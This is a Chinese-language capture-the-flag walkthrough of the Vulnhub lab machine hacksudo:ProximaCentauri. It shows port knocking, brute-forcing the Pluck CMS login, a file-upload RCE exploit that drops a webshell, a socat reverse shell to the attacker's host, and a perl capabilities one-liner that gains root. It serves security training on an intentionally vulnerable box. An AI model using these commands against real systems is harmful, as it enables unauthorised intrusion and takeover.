Vulnhub 靶机篇:hacksudo:ProximaCentauri
## 0x01 靶机信息> - **名称**:hacksudo:ProximaCentauri
> - **发布日期**:2021 年 6 月 8 日
> - **作者**:Vishal Waghmare
> - **系列**:hacksudo
> - **难度**:简单到中等
> - **简介**:由 hacksudo 团队成员 vishal Waghmare、Soham Deshmukh 创建的盒子 这个盒子应该是简单到中等的。这台机器是为 InfoSec Prep Discord 服务器 (https://discord.gg/tsEQqDJh) 和网站 (https://hacksudo.com) 创建的这个盒子是为了提高 Linux 权限升级和 CMS 技能而创建的,希望你们喜欢。
> - **下载链接**:[https://download.vulnhub.com/hacksudo/hacksudo-ProximaCentauri.zip](https://download.vulnhub.com/hacksudo/hacksudo-ProximaCentauri.zip)
> - **网络**:DHCP自动分配
## 0x02 Write-Up
### 2.1 信息收集
#### 2.1.1 主机扫描
目标机IP:192.168.3.48
!(https://img-oss.hg021b.org/2024/7/c95887e8b0e7ec2bd5dde015dbe3af14.png)
Kali虚拟机:192.168.3.23
使用nmap工具,扫描出开放了80端口,采用的pluck 4.7.13以及一个被过滤的22
``` txt
nmap -sS -Pn -p- -A -T4 192.168.3.48
-sS 隐蔽扫描,-Pn 禁Ping,-p- 所有端口,-A 综合扫描,-T4 快速扫描
```
!(https://img-oss.hg021b.org/2024/7/310fd75b7928ebab633e39fc0c8b5b35.png)
#### 2.1.2 访问http
这是一个关于恒星的网站,暂无其他发现
!(https://img-oss.hg021b.org/2024/7/8214a5d1d09b8bb57c9a1baf8e721f9c.png)
#### 2.1.3 目录遍历
使用gobuster工具遍历目录
``` txt
gobuster dir -u http://192.168.3.48/ -w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php
dir 目录模式,-u 指定url,-w 指定字典文件,-x 指定后缀
```
!(https://img-oss.hg021b.org/2024/7/306a6ee4c27cddae9d53fba0f00f5098.png)
login.php是一个pluck登录页面
!(https://img-oss.hg021b.org/2024/7/da1e7b7c14177df68a95ce77dd8b3975.png)
搜索一下这个版本是否有可利用的漏洞
``` txt
searchsploit pluck 4.7.13
```
!(https://img-oss.hg021b.org/2024/7/a87d8bb3ebccb139724709f1640b6d93.png)
查看漏洞信息,得知需要一个管理员权限的账户才能利用
!(https://img-oss.hg021b.org/2024/7/6525c8b5f4e6e80a6e1f0c5015ce6c71.png)
``` txt
4.7.13 之前的 Pluck CMS 中的文件上传限制绕过漏洞允许管理员
特权用户通过“管理文件”功能获得主机访问权限,
这可能会导致远程代码执行。
```
继续查看其他目录,在planet目录下面还有子目录travel
!(https://img-oss.hg021b.org/2024/7/8c8c53541f6857423fc52337c9b99d9a.png)
!(https://img-oss.hg021b.org/2024/7/35c4122080c1396e7f22782203341e6b.png)
好像是一个可控的摄像头之类的
``` txt
WASD move, R|F up | down, Q|E roll, up|down pitch, left|right yaw shift speed up
space/esc toggle mouse controls
T Teleport to next object
Scroll to increase/decrease your field of view.
翻译:
WASD 移动,R|F 向上 |下、Q|E 横滚、上|下俯仰、左|右偏航移位加速
空格/ESC 切换鼠标控制
T 传送到下一个物体
滚动以增加/减少视野。
```
查看源代码中有这样一段话
!(https://img-oss.hg021b.org/2024/7/02275a1c325f3ce75112ef59e5076f20.png)
``` txt
here you can open portal and travel to proxima,the co-ordinate is? RA for open,Dec for close The proxima blackwhole portal......get co-ordinate from https://g.co/kgs/F9Lb6b
翻译:
在这里你可以打开传送门并前往比邻星,坐标是? RA 表示打开,Dec 表示关闭 Proxima black整个门户......从 https://g.co/kgs/F9Lb6b 获取坐标
```
打开url是在搜索比邻星,接着查看坐标
!(https://img-oss.hg021b.org/2024/7/fa3a6c2aa9c3a7c2624f039e948c85b0.png)
!(https://img-oss.hg021b.org/2024/7/dd52978f7a56ad024b3940827a5793b0.png)
``` txt
RA 14h 29m 43s | Dec -62° 40′ 46″
```
打开传送门可以联想到之前受限制的ssh,三组三组数字,打开和关闭,可以联想到knock
### 2.2 渗透路线
#### 2.2.1 使用knock打开ssh端口
``` txt
knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。
```
``` txt
knock 192.168.3.48 14 29 43
IP+序列号
nmap -sS -Pn -p 22 -T4 192.168.3.48
-p 指定22端口
```
猜想正确,ssh端口打开
!(https://img-oss.hg021b.org/2024/7/16b65c8d3f5c7a3153508422f20717b7.png)
ssh连接,发现提示
``` txt
did you tried?cont1=^https://github.com/hacksudo/fog-hacksudo/blob/main/blackhole.lst^
你尝试过cont1=这个url里的文件吗
```
!(https://img-oss.hg021b.org/2024/7/733bd8e1f1f81ad7d3d9066e77a86991.png)
这个文件里面应该就是密码,不过cont1=显然是在http里的
!(https://img-oss.hg021b.org/2024/7/97aba44624a1c7dc87638a2375d25705.png)
####2.2.2 使用burpsuite爆破密码
回顾login界面抓包,可以发现cont1在这里
!(https://img-oss.hg021b.org/2024/7/1085b2f2ff46a71bfc0ecbc84409a397.png)
使用burpsuite里的sniper模块
!(https://img-oss.hg021b.org/2024/7/fb4fde8d3a18c71aa9444d8e3960062b.png)
在payloads中导入这个文件
!(https://img-oss.hg021b.org/2024/7/d0b30b0c82fab4fade05a71b2fb07ae5.png)
开始爆破
!(https://img-oss.hg021b.org/2024/7/60ee09b2bdcd999e1d1352411cb6c96f.png)
爆破成功,得到密码hacktheplanet
!(https://img-oss.hg021b.org/2024/7/3f52c8e48e47a12534e1d60323ba48cf.png)
登入后可以发现这是管理员账户,满足漏洞利用条件
!(https://img-oss.hg021b.org/2024/7/8d14273cd7ef4470f066b997aa9f1b07.png)
#### 2.2.3 利用Pluck CMS 4.7.13 - File Upload Remote Code Execution
``` txt
python3.7 49909.py 192.168.3.48 80 hacktheplanet ""
指定目标IP+端口+密码+路径
```
!(https://img-oss.hg021b.org/2024/7/fd2b3205e55c7b36df841c08d3ac1029.png)
访问webshell(http://192.168.3.48/files/shell.phar)
!(https://img-oss.hg021b.org/2024/7/244928a03a2151e194eb3bb4b1c2719d.png)
#### 2.2.4 反弹shell
``` bash
nc -lvvp 5555
监听端口
```
!(https://img-oss.hg021b.org/2024/7/15845d552a1307e333a211c47c6f3541.png)
``` bash
socat反弹(https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-udp)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.3.23:5555
```
!(https://img-oss.hg021b.org/2024/7/fd380f8906a0e6bb24e59b3b198ee7ae.png)
反弹成功
!(https://img-oss.hg021b.org/2024/7/ec1860b26a2c4381ce7387be7e0aba85.png)
查看flag1
!(https://img-oss.hg021b.org/2024/7/474b39a6582c53b8aa2f9942e7b2d424.png)
``` txt
heygood going ...your very close to root ...:) catch me !!!!!
提示我们已经很接近root了,把握住
```
#### 2.2.5 提权用户proxima
浏览到backups目录下的mysql.bak文件,里面有数据库的用户名密码
``` txt
用户名:alfauser
密码:passw0rd
```
!(https://img-oss.hg021b.org/2024/7/b283d1dcd735a5865cdc8606db9bd081.png)
登入成功
!(https://img-oss.hg021b.org/2024/7/aeb15e8d91c63e3d46881e85dcf34b9e.png)
使用proximacentauri数据库,搜索内容,里面有一组账户名密码
``` mysql
show databases;
显示所有的数据库
use proximacentauri;
使用数据库
show tables;
显示所有的表
select * from authors;
搜索表内所有内容
得到用户名、密码、邮箱
proxima | alfacentauri123 | vishal@hacksudo.com |
```
!(https://img-oss.hg021b.org/2024/7/8c013026c5c8ebf14085bf19850185eb.png)
提权成功
!(https://img-oss.hg021b.org/2024/7/baa5fef3e21ef93af6d1b81059c3636e.png)
获得flag
!(https://img-oss.hg021b.org/2024/7/3c293c619bd62cc8f32787d80ca60c73.png)
#### 2.2.6 利用perl(Capabilities)提权
``` bash
getcap -r / 2>/dev/null
递归查找具有扩展能力的文件
```
!(https://img-oss.hg021b.org/2024/7/5f03adc3c233d98aeb8f985d22ee0de5.png)
利用perl(Capabilities)提权
``` bash
/home/proxima/proximaCentauriA/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
```
!(https://img-oss.hg021b.org/2024/7/3aa4697570ddc3d78452f8a4213b78fc.png)
获得flag
!(https://img-oss.hg021b.org/2024/7/9480ae2a551655553c117bf905a9eade.png)
页:
[1]